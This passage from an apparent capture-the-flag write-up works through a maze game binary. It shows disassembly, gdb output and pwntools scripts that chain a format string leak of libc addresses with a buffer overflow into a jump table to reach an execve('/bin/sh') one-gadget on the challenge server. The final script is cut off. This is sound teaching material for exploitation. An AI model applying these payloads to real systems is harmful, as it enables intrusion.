rax, qword &#x5B;rbp - 0x20]\n            0x00401d2a      4889c7         mov rdi, rax\n            0x00401d2d      e80eecffff     call sym.imp.fclose\n            0x00401d32      bf20254000     mov edi, str.Press_enter_to_return_to_the_menue ; 0x402520 ; &quot;Press enter to return to the menue&quot;\n            0x00401d37      b800000000     
mov eax, 0\n            0x00401d3c      e82fecffff     call sym.imp.printf\n            0x00401d41      488b05581420.  mov rax, qword &#x5B;obj.stdout] ; &#x5B;0x6031a0:8]=0\n            0x00401d48      4889c7         mov rdi, rax\n<\/pre><\/div>\n<br\/>As we can see from the above output, a file called <code>egg.txt<\/code> is opened after printing the congratulation message (<code>puts<\/code>). Within a loop, up to <code>0x400<\/code> bytes at a time are read from the file (<code>fgets<\/code>). If the <code>fgets<\/code> call succeeded, a call to <code>printf<\/code> is made. The first parameter passed in <code>edi<\/code> contains the format string stored at <code>0x40251c<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\n&#x5B;0x00400a60]&gt; ps @ 0x40251c\n%s\n<\/pre><\/div>\n<br\/>&#8230; which simply outputs a string. This string is the second argument passed in <code>rsi<\/code>, which contains the address of the bytes previously read by <code>fgets<\/code>. Summing it up, this part of the code prints a congratulation message followed by the content of the file <code>egg.txt<\/code> (stored on the server).\n<br\/>\n<br\/>Based on the other strings we have found, it is fair to assume that we need to find the key and open the chest in order to reach this code.\n<br\/>\n<br\/>In order to find the key, we have to walk through the maze searching for it. 
I started by implementing a simple <a href=\"https:\/\/en.wikipedia.org\/wiki\/Maze_solving_algorithm#Wall_follower\" target=\"_new\" rel=\"noopener noreferrer\">wall follower<\/a> python script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom pwn import *\nimport sys\nimport time\n\ndef getCmd(n):\n  if   (n == 0): return &#039;go north&#039;\n  elif (n == 1): return &#039;go west&#039;\n  elif (n == 2): return &#039;go south&#039;\n  elif (n == 3): return &#039;go east&#039;\n\np = process(&#039;.\/maze&#039;)\np.sendlineafter(&#039;&gt;&#039;, &#039;scryh&#039;) # name\np.sendlineafter(&#039;&gt;&#039;, &#039;3&#039;)     # play\np.recvuntil(&#039;&gt;&#039;)\n\nheading = 0 # 0=north, 1=west, 2=south, 3=east\ncur = heading\nkey = &#039;&#039;\n\nwhile True:\n  time.sleep(0.1) # for demonstration purpose\n  p.sendline(getCmd(cur))\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  print(ret)\n  print(getCmd(cur))\n  if (&#039;There is a wall!&#039; in ret):\n    if (cur == heading): heading = (heading - 1 ) % 4\n    cur = heading\n  else:\n    heading = cur\n    cur = (heading + 1) % 4\n\n<\/pre><\/div>\n<br\/>The script follows the wall on the left-hand side:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_01.gif\" \/>\n<br\/>\n<br\/>Now we need to add some code within the loop to search for the key and open the locked chest:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\n  ...\n  p.sendline(&#039;search&#039;) # search for key \/ chest\n  ret = p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a key!&#039; in ret):\n    p.sendline(&#039;pick up&#039;)\n    p.recvuntil(&#039;You pick up the key: &#039;)\n    key = p.recv(32)\n    p.recvuntil(&#039;&gt;&#039;)\n  if (&#039;You found a locked chest!&#039; in ret and 
key != &#039;&#039;):\n    p.sendline(&#039;open&#039;)\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key)\n    p.interactive()\n<\/pre><\/div>\n<br\/>In order to run the script on the server the following line:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\np = process(&#039;.\/maze&#039;)\n<\/pre><\/div>\n<br\/>&#8230; needs to be replaced:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; title: ; notranslate\" title=\"\">\np = remote(&#039;whale.hacking-lab.com&#039;, 7331)\n<\/pre><\/div>\n<br\/>After running the script, we only have to wait until the key is found and the chest can be opened:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nCongratulation, you solved the maze. Here is your reward:\n                 *****\n              ****   ****\n            ***         ***\n          ***             ***\n        ***                 ***\n      ***     ****   ****     ***\n     **      ** *** **  **      **\n    **           **   ***.       
**\n   **         .***  **  **        **\n  **         ******  ****          **\n **                                 **\n**        +-----------------+        **\n*         | +--+ *  *  +--+ |         *\n*         | |  |  ** * |  | |         *\n*         | +--+ ** ** +--+ |         *\n*         |  * **  ** *** * |         *\n*         | * *  ** *** * * |         *\n**        | +--+ * *  &#x5B;] *  |        **\n *        | |  |  *** ** ** |        *\n **       | +--+ ** *** **  |       **\n  **      +-----------------+      **\n   **                             **\n    ***                         ***\n      ***                     ***\n        ****               ****\n           *****       *****\n               *********\nPress enter to return to the menue\n<\/pre><\/div>\n<br\/>Great! We have got the content of the <code>egg.txt<\/code>. Hm, but wait &#8230; what is this? For an actual QR code there are far too few pixels.\n<br\/>\n<br\/>Trying to turn the ASCII QR code into some useful information did not succeed, and until now the challenge felt far too easy for a hard challenge. I also wondered why the binary is provided, since we don&#8217;t really need it to implement a wall follower script like the above. 
Thus there must be more to the binary.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Vulnerability 1: Buffer overflow<\/h3>\n<br\/>When analyzing the binary with <code>r2<\/code>, I noticed that the functions of the different menu entries (<code>[1] Change User<\/code>, <code>[2] Help<\/code>, &#8230;) are called through a jump table:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [14,17]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pdf @ main\n\/ (fcn) main 318\n|   main ();\n|           ; var int local_14h @ rbp-0x14\n|           ; var int local_10h @ rbp-0x10\n|           ; var unsigned int local_1h @ rbp-0x1\n|           ; DATA XREF from entry0 (0x400a7d)\n|           0x00401e7a      55             push rbp\n|           0x00401e7b      4889e5         mov rbp, rsp\n|           0x00401e7e      4883ec20       sub rsp, 0x20\n...\n|     |`--&gt; 0x00401f95      8b45ec         mov eax, dword &#x5B;local_14h]\n|     | :   0x00401f98      89c0           mov eax, eax\n|     | :   0x00401f9a      488b04c56031.  mov rax, qword &#x5B;rax*8 + sym.error] ; &#x5B;0x603160:8]=0x400bba sym.error\n|     | :   0x00401fa2      488945f0       mov qword &#x5B;local_10h], rax\n|     | :   0x00401fa6      488b45f0       mov rax, qword &#x5B;local_10h]\n|     | :   0x00401faa      ffd0           call rax\n|     | :   ; CODE XREF from main (0x401f93)\n|     `---&gt; 0x00401fac      c745ec000000.  mov dword &#x5B;local_14h], 0\n\\       `=&lt; 0x00401fb3      e9f2feffff     jmp 0x401eaa\n\n<\/pre><\/div>\n<br\/>The user input (the number of the menu entry) is stored at <code>[local_14h]<\/code>. 
This number is multiplied by 8 (64-bit addresses) and added to the address of the jump-table (<code>0x603160<\/code>), which contains five function addresses:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pxq @ 0x603160\n0x00603160  0x0000000000400bba  0x0000000000400bde   ..@.......@.....\n0x00603170  0x00000000004010e3  0x0000000000401656   ..@.....V.@.....\n0x00603180  0x0000000000401e44  0x0000000000000000   D.@.............\n\n<\/pre><\/div>\n<br\/>Depending on the entered number, the corresponding function is called.\n<br\/>\n<br\/>My first hope was that there might be a missing or insufficient bounds check for the number to be entered, which would enable us to call an address outside of the jump-table, but this was not the case.\n<br\/>\n<br\/>Thus we need to keep analyzing the binary. Especially interesting are functions like <code>fgets<\/code>, which actually read data from the user. We can list all function calls to <code>fgets<\/code> by using the <code>axt<\/code> command again:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; axt @ sym.imp.fgets\nsub.e_H_e_J_bde 0x400c27 &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401758 &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401c4e &#x5B;CALL] call sym.imp.fgets\n(nofunc) 0x401d1c &#x5B;CALL] call sym.imp.fgets\n\n<\/pre><\/div>\n<br\/>By disassembling the code before the actual call, we can determine which parameters are passed to the function. 
The third call at <code>0x401c4e<\/code> looks interesting:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,7,15,16,17]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pd 15 @ 0x401c4e - 60\n            0x00401c12      f4             hlt\n            0x00401c13      0300           add eax, dword &#x5B;rax]\n            0x00401c15      0000           add byte &#x5B;rax], al\n        ,=&lt; 0x00401c17      e985010000     jmp 0x401da1\n        |   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x78e)\n        |   0x00401c1c      bf80244000     mov edi, str.The_chest_is_locked._Please_enter_the_key: ; 0x402480 ; &quot;The chest is locked. Please enter the key:\\n&gt; &quot;\n        |   0x00401c21      b800000000     mov eax, 0\n        |   0x00401c26      e845edffff     call sym.imp.printf\n        |   0x00401c2b      488b056e1520.  mov rax, qword &#x5B;obj.stdout] ; &#x5B;0x6031a0:8]=0\n        |   0x00401c32      4889c7         mov rdi, rax\n        |   0x00401c35      e8b6edffff     call sym.imp.fflush\n        |   0x00401c3a      488b05671520.  mov rax, qword &#x5B;obj.stdin]  ; &#x5B;0x6031a8:8]=0\n        |   0x00401c41      4889c2         mov rdx, rax\n        |   0x00401c44      be28000000     mov esi, 0x28               ; &#039;(&#039; ; 40\n        |   0x00401c49      bf40316000     mov edi, 0x603140           ; &#039;@1`&#039; ; &quot;\\n&quot;\n        |   0x00401c4e      e86dedffff     call sym.imp.fgets\n\n<\/pre><\/div>\n<br\/>This part of the code reads the key when the chest is opened. But notice the parameters to <code>fgets<\/code>: up to <code>0x28<\/code> bytes are read to the address <code>0x603140<\/code>. Remember that the jump-table is located at <code>0x603160<\/code>? 
This means that the last 8 bytes of the data read by <code>fgets<\/code> will actually overflow into the jump-table (overwriting the first address)!\n<br\/>\n<br\/>In order to verify this, I added another 8 bytes to the key (key length: <code>32<\/code> bytes = <code>0x20<\/code> bytes):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; gutter: false; highlight: [3]; title: ; notranslate\" title=\"\">\n    ...\n    p.recvuntil(&#039;The chest is locked. Please enter the key:\\n&gt; &#039;)\n    p.sendline(key + &#039;A&#039;*8) # added 8 bytes\n    p.interactive()\n\n<\/pre><\/div>\n<br\/>&#8230; and reran the script locally. After the congratulation message is displayed, we can verify the overflow by viewing the memory with <code>gdb<\/code> (I use <a href=\"https:\/\/github.com\/longld\/peda\" target=\"_new\" rel=\"noopener noreferrer\">gdb-peda<\/a>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# gdb .\/maze $(pidof maze)\nReading symbols from .\/maze...(no debugging symbols found)...done.\nAttaching to program: \/root\/Documents\/he19\/egg23\/maze, process 8582\n...\ngdb-peda$ x\/6xg 0x603160\n0x603160:\t0x0041414141414141\t0x0000000000400bde\n0x603170:\t0x00000000004010e3\t0x0000000000401656\n0x603180:\t0x0000000000401e44\t0x0000000000000000\n<\/pre><\/div>\n<br\/>The first address of the jump-table has been overwritten with the value <code>0x0041414141414141<\/code>. 
We can trigger a call to this function by entering <code>0<\/code> in the main menu:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [2,24,41]; title: ; notranslate\" title=\"\">\n&#x5B;----------------------------------registers-----------------------------------]\nRAX: 0x41414141414141 (&#039;AAAAAAA&#039;)\nRBX: 0x0\nRCX: 0x7f3c7f25a804 (&lt;write+20&gt;:\tcmp    rax,0xfffffffffffff000)\nRDX: 0x0\nRSI: 0x7f3c7f32d8c0 --&gt; 0x0\nRDI: 0x0\nRBP: 0x7ffec3f673a0 --&gt; 0x401fc0 (push   r15)\nRSP: 0x7ffec3f67380 --&gt; 0x401fc0 (push   r15)\nRIP: 0x401faa (call   rax)\nR8 : 0x7f3c7f32d8c0 --&gt; 0x0\nR9 : 0x7f3c7f332500 (0x00007f3c7f332500)\nR10: 0x7f3c7f2dbae0 --&gt; 0x100000000\nR11: 0x246\nR12: 0x400a60 (xor    ebp,ebp)\nR13: 0x7ffec3f67480 --&gt; 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x10297 (CARRY PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)\n&#x5B;-------------------------------------code-------------------------------------]\n   0x401f9a:\tmov    rax,QWORD PTR &#x5B;rax*8+0x603160]\n   0x401fa2:\tmov    QWORD PTR &#x5B;rbp-0x10],rax\n   0x401fa6:\tmov    rax,QWORD PTR &#x5B;rbp-0x10]\n=&gt; 0x401faa:\tcall   rax\n   0x401fac:\tmov    DWORD PTR &#x5B;rbp-0x14],0x0\n   0x401fb3:\tjmp    0x401eaa\n   0x401fb8:\tnop    DWORD PTR &#x5B;rax+rax*1+0x0]\n   0x401fc0:\tpush   r15\nNo argument\n&#x5B;------------------------------------stack-------------------------------------]\n0000| 0x7ffec3f67380 --&gt; 0x401fc0 (push   r15)\n0008| 0x7ffec3f67388 --&gt; 0x400a60 (xor    ebp,ebp)\n0016| 0x7ffec3f67390 --&gt; 0x41414141414141 (&#039;AAAAAAA&#039;)\n0024| 0x7ffec3f67398 --&gt; 0xa00000000000000 (&#039;&#039;)\n0032| 0x7ffec3f673a0 --&gt; 0x401fc0 (push   r15)\n0040| 0x7ffec3f673a8 --&gt; 0x7f3c7f19409b (&lt;__libc_start_main+235&gt;:\tmov    edi,eax)\n0048| 0x7ffec3f673b0 --&gt; 0x0\n0056| 0x7ffec3f673b8 --&gt; 0x7ffec3f67488 --&gt; 0x7ffec3f6854c --&gt; 0x4700657a616d2f2e 
(&#039;.\/maze&#039;)\n&#x5B;------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\nStopped reason: SIGSEGV\n0x0000000000401faa in ?? ()\n<\/pre><\/div>\n<br\/>The program raises a segmentation fault, since <code>rax<\/code> contains <code>0x41414141414141<\/code>. Thus we successfully control the instruction pointer.\n<br\/>\n<br\/>Since <i>NX<\/i> is enabled and the server is probably running <i>ASLR<\/i>, it is quite challenging to determine an address we could jump to. Luckily another vulnerability comes in handy here.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Vulnerability 2: Format String<\/h3>\n<br\/>When running the program, the first thing the user is supposed to do is to enter a name. This felt quite strange, because the name did not seem to be used anywhere. However, I could not spot an overflow vulnerability where the name is read.\n<br\/>\n<br\/>What also felt quite strange is the fact that the entered commands (e.g. <code>go south<\/code>) are XORed with <code>0x42<\/code> before being compared.\n<br\/>\n<br\/>Along with <code>r2<\/code> I usually use <a href=\"https:\/\/www.nsa.gov\/resources\/everyone\/ghidra\/\" target=\"_new\" rel=\"noopener noreferrer\">ghidra<\/a> to keep track of the decompiled C source code. When browsing the C source code, the following part caught my attention:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_02.png\" \/>\n<br\/>\n<br\/>The XORed string being compared here is (<code>'5*-#\/+HB'<\/code>), which actually is the command &#8230;\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nroot@kali:~\/Documents\/he19\/egg23# python\n&gt;&gt;&gt; s = &#039;5*-#\/+HB&#039;\n&gt;&gt;&gt; r = &#039;&#039;\n&gt;&gt;&gt; for c in s:\n...   
r+=chr(0x42^ord(c))\n...\n&gt;&gt;&gt; r\n&#039;whoami\\n\\x00&#039;\n<\/pre><\/div>&#8230; <code>whoami<\/code>.\n<br\/>\n<br\/>And this command obviously outputs the entered username: <code>printf(&DAT_00603200)<\/code>. The username string is the first parameter to the call to <code>printf<\/code>, which is the format string to be used. Thus we have a classic format string vulnerability! Let&#8217;s quickly verify this by inserting format specifiers in the name:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/maze\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %p.%p.%p\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +-----+-----+\n               |\n               |\n               |\n   +-----+     +\n         |     |\n         |  X  |\n         |     |\n         +-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +-----+-----+\n               |\n               |\n               |\n   +-----+     +\n         |     |\n         |  X  |\n         |     |\n         +-----+\n\n\n\n\n\n0x4025a7.0x4025af.0x7f87088a4804\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>It works! 
We successfully leaked three addresses using the format specifier <code>%p<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Forging the final exploit<\/h3>\n<br\/>Summing it up, the two vulnerabilities enable us to:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>control the instruction pointer (buffer overflow)<\/li><li>leak register and stack values (format string vulnerability)<\/li><\/ul>\n<br\/>\n<br\/>Actually the format string vulnerability could also be used to control the instruction pointer, though it is far easier to use the buffer overflow for this purpose and leverage the format string vulnerability to leak addresses only.\n<br\/>\n<br\/>As we have already pointed out, the binary is compiled with <i>NX<\/i> (we cannot directly execute shellcode on the stack or other writable segments) and <i>ASLR<\/i> is probably enabled on the server (we do not know the address of e.g. the libc).\n<br\/>\n<br\/>Thus the attack plan looks like this:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>determine the libc version on the server by leaking a libc address (format string vulnerability)<\/li><li>calculate the libc base address<\/li><li>calculate the address of a one gadget<\/li><li>overwrite the jump-table with the one gadget address (buffer overflow)<\/li><li>trigger the one gadget by choosing <code>0<\/code> in the main menu<\/li><\/ul>\n<br\/>\n<br\/>In order to determine the libc version, we need to leak a libc address. For this purpose the format string vulnerability can be used. 
At first let&#8217;s set a breakpoint on the vulnerable <code>printf<\/code> call:\n<br\/>\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# gdb .\/maze\nReading symbols from .\/maze...(no debugging symbols found)...done.\ngdb-peda$ b *0x401e17\nBreakpoint 1 at 0x401e17\ngdb-peda$\n\n<\/pre><\/div>\n<br\/>Now we run the program (<code>r<\/code>), enter some name (e.g. <code>test<\/code>), choose <code>[3] Play<\/code> and enter the command <code>whoami<\/code> in order to hit the breakpoint:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;----------------------------------registers-----------------------------------]\nRAX: 0x0\nRBX: 0x0\nRCX: 0x7ffff7eca804 (&lt;write+20&gt;:\tcmp    rax,0xfffffffffffff000)\nRDX: 0x4025af --&gt; 0x5b1b002165794200\nRSI: 0x4025a7 (&quot;5*-#\/+HB&quot;)\nRDI: 0x6031f0 --&gt; 0x74736574 (&#039;test&#039;)\nRBP: 0x7fffffffe100 --&gt; 0x7fffffffe130 --&gt; 0x401fc0 (push   r15)\nRSP: 0x7fffffffe0d0 --&gt; 0x6031a0 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\nRIP: 0x401e17 (call   0x400970 &lt;printf@plt&gt;)\nR8 : 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR9 : 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR10: 0x7ffff7fa2500 (0x00007ffff7fa2500)\nR11: 0x246\nR12: 0x400a60 (xor    ebp,ebp)\nR13: 0x7fffffffe210 --&gt; 0x1\nR14: 0x0\nR15: 0x0\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)\n&#x5B;-------------------------------------code-------------------------------------]\n   0x401e0b:\tjne    0x401e1e\n   0x401e0d:\tmov    edi,0x6031f0\n   0x401e12:\tmov    eax,0x0\n=&gt; 0x401e17:\tcall   0x400970 &lt;printf@plt&gt;\n   0x401e1c:\tjmp    0x401e2e\n   0x401e1e:\tmov    eax,0x0\n   0x401e23:\tcall   0x400bba &lt;error&gt;\n   0x401e28:\tnop\nGuessed arguments:\narg&#x5B;0]: 0x6031f0 --&gt; 0x74736574 
(&#039;test&#039;)\n&#x5B;------------------------------------stack-------------------------------------]\n0000| 0x7fffffffe0d0 --&gt; 0x6031a0 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\n0008| 0x7fffffffe0d8 --&gt; 0x7ffff7f9c760 --&gt; 0xfbad2a84\n0016| 0x7fffffffe0e0 --&gt; 0x7ffff7f982a0 --&gt; 0x0\n0024| 0x7fffffffe0e8 --&gt; 0x7ffff7e4ff9d (&lt;fflush+157&gt;:\txor    edx,edx)\n0032| 0x7fffffffe0f0 --&gt; 0x0\n0040| 0x7fffffffe0f8 --&gt; 0x15f00000000\n0048| 0x7fffffffe100 --&gt; 0x7fffffffe130 --&gt; 0x401fc0 (push   r15)\n0056| 0x7fffffffe108 --&gt; 0x401fac (mov    DWORD PTR &#x5B;rbp-0x14],0x0)\n&#x5B;------------------------------------------------------------------------------]\nLegend: code, data, rodata, value\n\nBreakpoint 1, 0x0000000000401e17 in ?? ()\ngdb-peda$\n\n<\/pre><\/div>\n<br\/>The first argument to the <code>printf<\/code> call is passed in <code>RDI<\/code>. This is the name we entered, which is used as the format string (in this case <code>\"test\"<\/code>). Leveraging this we can leak all following arguments, which are passed in the following order:\n<br\/><ul style=\"margin-top:8px;margin-bottom:-15px\"><li>RSI<\/li><li>RDX<\/li><li>RCX<\/li><li>R8<\/li><li>R9<\/li><li>Stack &#8230;<\/li><\/ul>\n<br\/>\n<br\/>This means that we can print the value of <code>RSI<\/code> by inserting the format specifier <code>%1$p<\/code>, <code>RDX<\/code> with <code>%2$p<\/code>, <code>RCX<\/code> with <code>%3$p<\/code> and so forth. 
The first item on the stack can thus be leaked with the format specifier <code>%6$p<\/code>.\n<br\/>\n<br\/>Viewing the stack we can see that the second item on the stack is actually a libc address of the symbol <code>_IO_2_1_stdout_<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngdb-peda$ x\/xg 0x7ffff7f9c760\n0x7ffff7f9c760 &lt;_IO_2_1_stdout_&gt;:\t0x00000000fbad2a84\n\n<\/pre><\/div>\n<br\/>In order to leak this address we need to insert the format specifier <code>%7$p<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# .\/maze \n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %7$p\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +     +\n   |     |\n   |     |\n   |     |\n   +     +-----+\n   |           |\n   |        X  |\n   |           |\n   +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n   +     +\n   |     |\n   |     |\n   |     |\n   +     +-----+\n   |           |\n   |        X  |\n   |           |\n   +-----+-----+\n\n\n\n\n\n0x7f730e1b8760\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>Since the stack position of this address on the server may vary, we need to verify this. 
I tried different offsets and used the <a href=\"https:\/\/libc.blukat.me\/\" target=\"_new\" rel=\"noopener noreferrer\">libc database search<\/a> to verify if the leaked address may be the symbol <code>_IO_2_1_stdout_<\/code>. Using the format specifier <code>%10$p<\/code> succeeded:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# nc whale.hacking-lab.com 7331\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nPlease enter your name:\n&gt; %10$p\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nChoose:\n&#x5B;1] Change User\n&#x5B;2] Help\n&#x5B;3] Play\n&#x5B;4] Exit\n&gt; 3\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n               +     +\n               |     |\n               |     |\n               |     |\n         +-----+     +\n         |           |\n         |  X        |\n         |           |\n         +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt; whoami\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nYour position:\n\n               +     +\n               |     |\n               |     |\n               |     |\n         +-----+     +\n         |           |\n         |  X        |\n         |           |\n         +-----+-----+\n\n\n\n\n\n0x7f5823580620\n\n\nEnter your command:\n&gt; \n<\/pre><\/div>\n<br\/>The leaked address of the server is <code>0x7f5823580620<\/code>. 
Using the <a href=\"https:\/\/libc.blukat.me\/\" target=\"_new\" rel=\"noopener noreferrer\">libc database search<\/a> we can determine that there are six possible libc versions:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_03.png\" width=\"800\"\/>\n<br\/>\n<br\/>The first three are <code>i386<\/code> libc versions. Since this is a 64-bit binary, we can omit these and only have to focus on the three <code>x64<\/code> versions.\n<br\/>\n<br\/>In order to determine the address of all one gadgets within these libc versions, we start by downloading them from the database:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg23_04.png\" width=\"800\"\/>\n<br\/>\n<br\/>Now we can use the <a href=\"https:\/\/github.com\/david942j\/one_gadget\" target=\"_new\" rel=\"noopener noreferrer\">one_gadget tool<\/a> in order to determine the offsets of all one gadgets:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23\/libc# one_gadget libc6_2.23-0ubuntu10_amd64.so\n0x45216 execve(&quot;\/bin\/sh&quot;, rsp+0x30, environ)\nconstraints:\n  rax == NULL\n\n0x4526a execve(&quot;\/bin\/sh&quot;, rsp+0x30, environ)\nconstraints:\n  &#x5B;rsp+0x30] == NULL\n\n0xf02a4 execve(&quot;\/bin\/sh&quot;, rsp+0x50, environ)\nconstraints:\n  &#x5B;rsp+0x50] == NULL\n\n0xf1147 execve(&quot;\/bin\/sh&quot;, rsp+0x70, environ)\nconstraints:\n  &#x5B;rsp+0x70] == NULL\n<\/pre><\/div>\n<br\/>Finally we can leverage the buffer overflow to try the different libc versions and one gadgets. 
In order to do this, we need to make a few adjustments to our former script:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nfrom pwn import *\nimport sys\nimport re\n\n# libc6_2.23-0ubuntu10_amd64.so\nstdout_offset = 0x3c5620\noneg1 = 0x45216\noneg2 = 0x4526a # working !\noneg3 = 0xf02a4\noneg4 = 0xf1147\n\n\ndef getCmd(n):\n  if   (n == 0): return &#039;go north&#039;\n  elif (n == 1): return &#039;go west&#039;\n  elif (n == 2): return &#039;go south&#039;\n  elif (n == 3): return &#039;go east&#039;\n\np = remote(&#039;whale.hacking-lab.com&#039;, 7331)\np.sendlineafter(&#039;&gt;&#039;, &#039;(%10$p)&#039;) # name: leak libc address\np.sendlineafter(&#039;&gt;&#039;, &#039;3&#039;)       # play\np.sendlineafter(&#039;&gt;&#039;, &#039;whoami&#039;)  # whoami\nleak = p.recvuntil(&#039;&gt;&#039;)\nx = re.search(&#039;\\((.*)\\)&#039;, leak)\nlibc_leak = int(x.group()&#x5B;1:-1], 16)\nlibc_base = 